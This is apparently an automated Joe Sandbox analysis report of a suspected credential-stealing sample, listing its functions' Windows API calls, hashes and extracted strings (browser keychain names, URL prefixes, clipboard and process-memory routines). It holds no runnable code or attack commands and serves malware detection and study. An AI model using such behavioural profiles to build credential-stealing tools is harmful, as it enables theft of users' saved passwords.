                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                          APIs
                                          • memset.MSVCRT ref: 004095FC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                          • String ID:
                                          • API String ID: 3655998216-0
                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                          APIs
                                          • memset.MSVCRT ref: 00445426
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                          • String ID:
                                          • API String ID: 1828521557-0
                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                          APIs
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                          • memcpy.MSVCRT ref: 00406942
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@FilePointermemcpy
                                          • String ID:
                                          • API String ID: 609303285-0
                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID:
                                          • API String ID: 2081463915-0
                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                          APIs
                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastRead
                                          • String ID:
                                          • API String ID: 2136311172-0
                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                          APIs
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                          APIs
                                          • EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • GetLastError.KERNEL32 ref: 0040995D
                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                          • GetLastError.KERNEL32 ref: 00409974
                                          • CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                          • String ID:
                                          • API String ID: 2565263379-0
                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                          APIs
                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                          APIs
                                          • EmptyClipboard.USER32 ref: 00409882
                                          • wcslen.MSVCRT ref: 0040988F
                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                          • memcpy.MSVCRT ref: 004098B5
                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                          • CloseClipboard.USER32 ref: 004098D7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                          • String ID:
                                          • API String ID: 2014503067-0
                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                          APIs
                                          • GetLastError.KERNEL32 ref: 004182D7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                          • LocalFree.KERNEL32(?), ref: 00418342
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                          • String ID: OsError 0x%x (%u)
                                          • API String ID: 403622227-2664311388
                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                          APIs
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          • OpenClipboard.USER32(?), ref: 00411878
                                          • GetLastError.KERNEL32 ref: 0041188D
                                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                            • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                            • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                          • String ID:
                                          • API String ID: 1203541146-0
                                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 004022A6
                                          • _wcsicmp.MSVCRT ref: 004022D7
                                          • _wcsicmp.MSVCRT ref: 00402305
                                          • _wcsicmp.MSVCRT ref: 00402333
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                          • memset.MSVCRT ref: 0040265F
                                          • memcpy.MSVCRT ref: 0040269B
                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • memcpy.MSVCRT ref: 004026FF
                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                          • API String ID: 577499730-1134094380
                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                          • String ID: :stringdata$ftp://$http://$https://
                                          • API String ID: 2787044678-1921111777
                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                          • GetDC.USER32 ref: 004140E3
                                          • wcslen.MSVCRT ref: 00414123
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                          • _snwprintf.MSVCRT ref: 00414244
                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 2080319088-3046471546
                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 00413221
                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                          • memset.MSVCRT ref: 00413292
                                          • memset.MSVCRT ref: 004132B4
                                          • memset.MSVCRT ref: 004132CD
                                          • memset.MSVCRT ref: 004132E1
                                          • memset.MSVCRT ref: 004132FB
                                          • memset.MSVCRT ref: 00413310
                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                          • memset.MSVCRT ref: 004133C0
                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                          • memcpy.MSVCRT ref: 004133FC
                                          • wcscpy.MSVCRT ref: 0041341F
                                          • _snwprintf.MSVCRT ref: 0041348E
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                          • SetFocus.USER32(00000000), ref: 004134B7
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                          • {Unknown}, xrefs: 004132A6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                          • API String ID: 4111938811-1819279800
                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                          • EndDialog.USER32(?,?), ref: 0040135E
                                          • DeleteObject.GDI32(?), ref: 0040136A
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                          • ShowWindow.USER32(00000000), ref: 00401398
                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                          • ShowWindow.USER32(00000000), ref: 004013A7
